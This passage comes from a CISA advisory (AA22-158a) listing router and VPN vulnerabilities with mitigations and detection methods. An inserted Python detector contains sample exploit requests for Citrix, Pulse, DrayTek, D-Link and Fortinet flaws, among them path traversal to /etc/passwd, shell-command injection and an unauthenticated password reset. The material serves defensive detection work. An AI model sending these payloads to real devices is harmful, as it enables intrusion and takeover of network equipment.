\r\nhttps://support.citrix.com/article/CTX267027\r\nTable 6: Information on DrayTek CVE-2020-8515\r\nDrayTek CVE-2020-8515          CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description\r\nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta\r\ndevices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.\r\nRecommended Mitigations\r\nUsers of affected models should upgrade to firmware 1.5.1 or later as soon as possible; the updated firmware\r\naddresses this issue.\r\nDisable remote access on your router if you do not need it.\r\nDisable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (port 443), so\r\nyou should also temporarily disable SSL VPN until you have updated the firmware.\r\nAlways back up your config before doing an upgrade.\r\nAfter upgrading, check that the web interface now shows the new firmware version.\r\nEnable syslog logging for monitoring if there are abnormal events. 
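Several entries in this appendix (Citrix CVE-2019-19781 above; DrayTek CVE-2020-8515 here; D-Link CVE-2019-16920, Fortinet CVE-2018-13382 and Pulse CVE-2019-11510 below) give HTTP inspection as the detection method. The following Python is an added example, not from the advisory or any vendor: it classifies parsed HTTP requests against the publicly reported exploitation shapes of those five issues, percent-decoding the path, query string and body before looking for path traversal, shell metacharacters, or the unauthenticated password-reset parameter. The request samples are constructed; the paths and the parameter names keyPath, ping_ipaddr and magic come from public write-ups of those CVEs and are the assumptions the signatures rest on.

```python
# Added example (not from the advisory or any vendor). Classifies HTTP
# requests against the publicly reported exploitation shapes of five CVEs in
# this appendix. Run it on requests reconstructed from a proxy, IDS or web
# server log in front of the affected device. The sample requests are
# constructed; paths and parameter names come from public write-ups of the
# CVEs and are the assumptions the signatures rest on.
from urllib.parse import unquote

# characters that turn a parameter value into a shell command on devices
# that pass it to a shell (DrayTek mainfunction.cgi, D-Link ping_test)
SHELL_METACHARS = (';', '|', '`', '$(', '${IFS}', chr(10), chr(13))


def has_shell_metachar(text):
    return any(m in text for m in SHELL_METACHARS)


def classify_request(method, target, body=''):
    '''Return the CVE identifiers whose known exploitation pattern this request
    matches. target is the raw request-target from the request line and body
    the raw (possibly percent-encoded) request body.'''
    raw_path, _, raw_query = target.partition('?')
    path = unquote(raw_path)
    query = unquote(raw_query)
    data = unquote(body)
    hits = []
    # Citrix ADC/Gateway: /vpn/../vpns/ traversal reaches scripts behind the unauthenticated /vpn/ tree
    if '/../vpns/' in path:
        hits.append('CVE-2019-19781')
    # Pulse Connect Secure: traversal out of /dana-na/ reads files off the appliance
    if path.startswith('/dana-na/../'):
        hits.append('CVE-2019-11510')
    # DrayTek Vigor: shell metacharacters in any parameter sent to mainfunction.cgi
    if path.endswith('/cgi-bin/mainfunction.cgi') and (has_shell_metachar(query) or has_shell_metachar(data)):
        hits.append('CVE-2020-8515')
    # D-Link: ping_test action whose address argument carries a command
    if 'action=ping_test' in data and has_shell_metachar(data):
        hits.append('CVE-2019-16920')
    # Fortinet SSL VPN: password change through the magic parameter with no authentication
    if method == 'POST' and path == '/remote/logincheck' and 'magic=' in data:
        hits.append('CVE-2018-13382')
    return hits


CONSTRUCTED_REQUESTS = [
    ('GET',  '/vpn/../vpns/cfg/smb.conf', ''),
    ('POST', '/vpn/../vpns/portal/scripts/newbm.pl', 'url=http://127.0.0.1&title=x'),
    ('GET',  '/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/', ''),
    ('POST', '/cgi-bin/mainfunction.cgi', 'action=login&keyPath=%27%0A/bin/sh%24%7BIFS%7D-c%24%7BIFS%7D%27id%27%0A%27&loginUser=a&loginPwd=a'),
    ('POST', '/apply_sec.cgi', 'html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0Aid'),
    ('POST', '/remote/logincheck', 'ajax=1&username=admin&credential2=NewPass1&magic=4tinet2095866'),
    ('GET',  '/vpn/index.html', ''),
    ('POST', '/remote/logincheck', 'ajax=1&username=admin&credential=Secret1'),
    ('POST', '/cgi-bin/mainfunction.cgi', 'action=login&loginUser=admin&loginPwd=admin'),
]


def summarize(requests):
    '''Count matches per CVE over a batch of (method, target, body) tuples.'''
    counts = {}
    for method, target, body in requests:
        for cve in classify_request(method, target, body):
            counts[cve] = counts.get(cve, 0) + 1
    return counts


if __name__ == '__main__':
    for method, target, body in CONSTRUCTED_REQUESTS:
        print(classify_request(method, target, body) or ['-'], method, target)
```

Match on the decoded request, as the example does, so that percent-encoded dots and newlines do not slip past the signatures; and treat a hit on a patched device as a scan, not an intrusion, until the device's own logs or configuration say otherwise.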
\r\nDetection Methods\r\nCheck that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for\r\nrouter admin) have been added.\r\nCheck whether any access control lists (ACLs) have been altered.\r\nVulnerable Technologies and Versions\r\nThis vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.\r\nReferences\r\nhttps://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\r\nhttp://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html\r\nhttps://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html\r\nTable 7: Information on D-Link CVE-2019-16920\r\nD-Link CVE-2019-16920          CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description\r\nUnauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends arbitrary input to a \"PingTest\" device common gateway interface (CGI) that\r\ncould lead to command injection. An attacker who successfully triggers the command injection could achieve full system\r\ncompromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615,\r\nDIR-835, and DIR-825.\r\nRecommended Mitigations\r\nRecommendation is to replace affected devices with ones that are currently supported by the vendor. 
End-of-life\r\ndevices should not be used.\r\nDetection Methods\r\nHTTP packet inspection to look for arbitrary input to the “ping_test” command\r\nVulnerable Technologies and Versions\r\nDIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and\r\nDIR-825\r\nReferences\r\nhttps://www.kb.cert.org/vuls/id/766427\r\nhttps://fortiguard.com/zeroday/FG-VD-19-117\r\nhttps://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3\r\nhttps://www.seebug.org/vuldb/ssvid-98079\r\nTable 8: Information on Fortinet CVE-2018-13382\r\nFortinet CVE-2018-13382          CVSS 3.0: 7.5 (High)\r\nVulnerability Description\r\nAn Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and\r\nFortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated\r\nattacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.\r\nRecommended Mitigations\r\nUpgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or\r\nabove or version 2.0.1 or above.\r\nSSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).\r\nMigrate SSL VPN user authentication from local to remote (LDAP or RADIUS).\r\nTotally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI\r\ncommands:\r\nconfig vpn ssl settings\r\nunset source-interface\r\nend\r\nDetection Methods\r\nHTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN\r\npassword modification\r\nVulnerable Technologies and Versions\r\nThis vulnerability affects the 
following products: \r\nFortinet FortiOS 6.0.0 to 6.0.4\r\nFortinet FortiOS 5.6.0 to 5.6.8\r\nFortinet FortiOS 5.4.1 to 5.4.10\r\nFortinet FortiProxy 2.0.0\r\nFortinet FortiProxy 1.2.8 and below\r\nFortinet FortiProxy 1.1.6 and below\r\nFortinet FortiProxy 1.0.7 and below\r\nFortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users use\r\nlocal authentication.\r\nReferences \r\nhttps://fortiguard.com/psirt/FG-IR-18-389\r\nhttps://fortiguard.com/advisory/FG-IR-18-389\r\nhttps://www.fortiguard.com/psirt/FG-IR-20-231\r\nTable 9: Information on Mikrotik CVE-2018-14847\r\nMikrotik CVE-2018-14847            CVSS 3.0: 9.1 (Critical)\r\nVulnerability Description \r\nMikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote\r\nauthenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.\r\nRecommended Mitigations \r\nUpgrade WinBox and RouterOS and change passwords\r\nFirewall the WinBox port from the public interface and from untrusted networks\r\nDetection Methods \r\nUse the export command to see all your configuration and inspect it for any abnormalities, such as unknown SOCKS\r\nproxy settings and scripts.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following MikroTik products:\r\nAll bugfix releases from 6.30.1 to 6.40.7\r\nAll current releases from 6.29 to 6.42\r\nAll RC releases from 6.29rc1 to 6.43rc3\r\nReferences\r\nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\r\nTable 10: Information on Netgear CVE-2017-6862\r\nNetgear CVE-2017-6862                  CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nNETGEAR WNR2000v3 devices 
before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices\r\nbefore 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the\r\nadministration webapp. The NETGEAR ID is PSV-2016-0261.\r\nRecommended Mitigations \r\nNETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all\r\naffected products. \r\nDetection Methods \r\nHTTP packet inspection to find any specially crafted packets attempting a buffer overflow through specialized\r\nparameters.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following products:\r\nWNR2000v3 before version 1.1.2.14\r\nWNR2000v4 before version 1.0.0.66\r\nWNR2000v5 before version 1.0.0.42\r\nR2000\r\nReferences \r\nhttps://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261\r\nhttps://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf\r\nhttp://www.securityfocus.com/bid/98740\r\nTable 11: Information on Pulse CVE-2019-11510\r\nPulse CVE-2019-11510                   CVSS 3.0: 10 (Critical)\r\nVulnerability Description \r\nIn Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an\r\nunauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file reading vulnerability. 
\r\nRecommended Mitigations \r\nUpgrade to the latest Pulse Secure VPN.\r\nStay alert to any scheduled tasks or unknown files/executables.\r\nCreate detection/protection mechanisms that respond to directory traversal (/../../../) attempts to read local system\r\nfiles.\r\nDetection Methods \r\nCISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.\r\nNmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following Pulse Connect Secure products:\r\n9.0R1 to 9.0R3.3\r\n8.3R1 to 8.3R7\r\n8.2R1 to 8.2R12\r\nReferences \r\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/\r\nTable 12: Information on Pulse CVE-2021-22893\r\nPulse CVE-2021-22893              CVSS 3.0: 10 (Critical)\r\nVulnerability Description \r\nPulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the\r\nWindows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an\r\nunauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This\r\nvulnerability has been exploited in the wild.\r\nRecommended Mitigations\r\nUpdate such systems to PCS 9.1R11.4.\r\nRun the PCS Integrity Assurance utility.\r\nEnable Unauthenticated Request logging.\r\nEnable remote logging.\r\nPulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other\r\nvulnerabilities.\r\nMonitor capabilities in open source scanners. 
\r\nDetection Methods \r\nLog correlation between the authentication servers responsible for LDAP and RADIUS authentication and the\r\nVPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing\r\nsuccess would be an anomalous event worthy of flagging.\r\nThe Pulse Security Check Tool.\r\nA ‘recovery’ file not present in legitimate versions. https://ive-host/dana-na/auth/recover[.]cgi?token=\u003cvaries\u003e.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.\r\nReferences \r\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/\r\nhttps://blog.pulsesecure.net/pulse-connect-secure-security-update/\r\nhttps://kb.cert.org/vuls/id/213092\r\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/\r\nhttps://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html\r\nTable 13: Information on QNAP CVE-2019-7192\r\nQNAP CVE-2019-7192               CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nThis improper access control vulnerability allows remote attackers to gain unauthorized access to the system. 
To fix\r\nthese vulnerabilities, QNAP recommends updating Photo Station to the latest version.\r\nRecommended Mitigations \r\nUpdate Photo Station to versions: \r\nQTS 4.4.1 Photo Station 6.0.3 and later\r\nQTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\r\nQTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\r\nQTS 4.2.6 Photo Station 5.2.11 and later \r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.\r\nReferences \r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25\r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 14: Information on QNAP CVE-2019-7193\r\nQNAP CVE-2019-7193                  CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nThis improper input validation vulnerability allows remote attackers to inject arbitrary code into the system. 
To fix the\r\nvulnerability, QNAP recommends updating QTS to the latest version.\r\nRecommended Mitigations \r\nUpdate QTS to versions: \r\nQTS 4.4.1 build 20190918 and later\r\nQTS 4.3.6 build 20190919 and later\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.\r\nReferences \r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25\r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 15: Information on QNAP CVE-2019-7194\r\nQNAP CVE-2019-7194             CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description\r\nThis external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix\r\nthe vulnerability, QNAP recommends updating Photo Station to the latest version.\r\nRecommended Mitigations \r\nUpdate Photo Station to versions: \r\nQTS 4.4.1 Photo Station 6.0.3 and later\r\nQTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\r\nQTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\r\nQTS 4.2.6 Photo Station 5.2.11 and later\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.\r\nReferences \r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25\r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 16: Information on QNAP CVE-2019-7195\r\nQNAP CVE-2019-7195                   CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nThis external control of file name or path vulnerability allows remote attackers to access or modify system 
files. To fix\r\nthe vulnerability, QNAP recommends updating Photo Station to the latest version.\r\nRecommended Mitigations \r\nUpdate Photo Station to versions: \r\nQTS 4.4.1 Photo Station 6.0.3 and later\r\nQTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\r\nQTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\r\nQTS 4.2.6 Photo Station 5.2.11 and later\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.\r\nReferences \r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25\r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 17: Information on Zyxel CVE-2020-29583\r\nZyxel CVE-2020-29583            CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nFirmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable\r\npassword. The password for this account can be found in cleartext in the firmware. 
This account can be used by\r\nsomeone to log in to the SSH server or web interface with admin privileges.\r\nRecommended Mitigations \r\nDownload the latest patch (4.60 Patch1 or newer)\r\nDetection Methods \r\nLogin attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following technologies and versions:\r\nATP series running firmware ZLD V4.60\r\nUSG series running firmware ZLD V4.60\r\nUSG FLEX series running firmware ZLD V4.60\r\nVPN series running firmware ZLD V4.60\r\nNXC2500 running firmware V6.00 through V6.10\r\nNXC5500 running firmware V6.00 through V6.10\r\nReferences \r\nhttp://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf\r\nhttps://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release\r\nhttps://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15\r\nhttps://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html\r\nhttps://www.zyxel.com/support/CVE-2020-29583.shtml\r\nhttps://www.zyxel.com/support/security_advisories.shtml\r\nRevisions\r\nInitial Version: June 7, 2022\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a"
	],
	"report_names": [
		"aa22-158a"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434809,
	"ts_updated_at": 1775826721,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a0f19efc809a407c598cf6c6396dc210d1a00f72.pdf",
		"text": "https://archive.orkl.eu/a0f19efc809a407c598cf6c6396dc210d1a00f72.txt",
		"img": "https://archive.orkl.eu/a0f19efc809a407c598cf6c6396dc210d1a00f72.jpg"
	}
}